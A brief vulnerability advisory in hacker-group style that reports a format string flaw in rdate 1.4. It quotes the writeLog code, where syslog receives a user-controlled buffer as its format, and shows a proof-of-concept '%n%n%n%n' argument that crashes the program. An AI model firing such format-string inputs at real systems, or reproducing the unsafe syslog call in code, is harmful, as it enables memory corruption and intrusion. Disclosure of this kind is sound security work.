+-----[ Software ]-----+

'rdate' retrieves the date and time from another machine on your network, 
using the RFC 868 protocol. If you run rdate as root, it will set your 
machine's local time to the time of the machine that you queried. 
(http://directory.fsf.org/sysadmin/remote/rdate.html)

+-----[ Version ]-----+

Version 1.4 (stable) released on 2004-04-27


+-----[ Description ]-----+

Format string vulnerability.


+-----[ Vulnerable Code ]-----+

[rdate.c]

static void writeLog(int is_error, char *format, ...)
{
  va_list args;
  int n;
  char buf[2048];
  va_start(args, format);
  n = vsnprintf(buf, sizeof(buf), format, args);
  va_end(args);

  if(n < 1)
    return; /* Error, which we can't report because this _is_ the error
	       reporting mechanism */
  if(log_mode)
    syslog(is_error?LOG_WARNING:LOG_INFO, buf); /* bad bad bad */
  if(is_error || print_mode)
    fprintf(is_error?stderr:stdout, "%s: %s\n", argv0, buf);
}


+-----[ Conclusion ]-----+

Virulent@siyahsapka.org:/rdate-1.4# ./rdate -l %n%n%n%n
Segmentation fault (core dumped)


+-----[ Greetings ]-----+

#coders @ irc.ttnet.net.tr
   	Deicide


+-----[ Contact ]-----+

http://virulent.siyahsapka.org

   virulent@siyahsapka.org


+----------------------+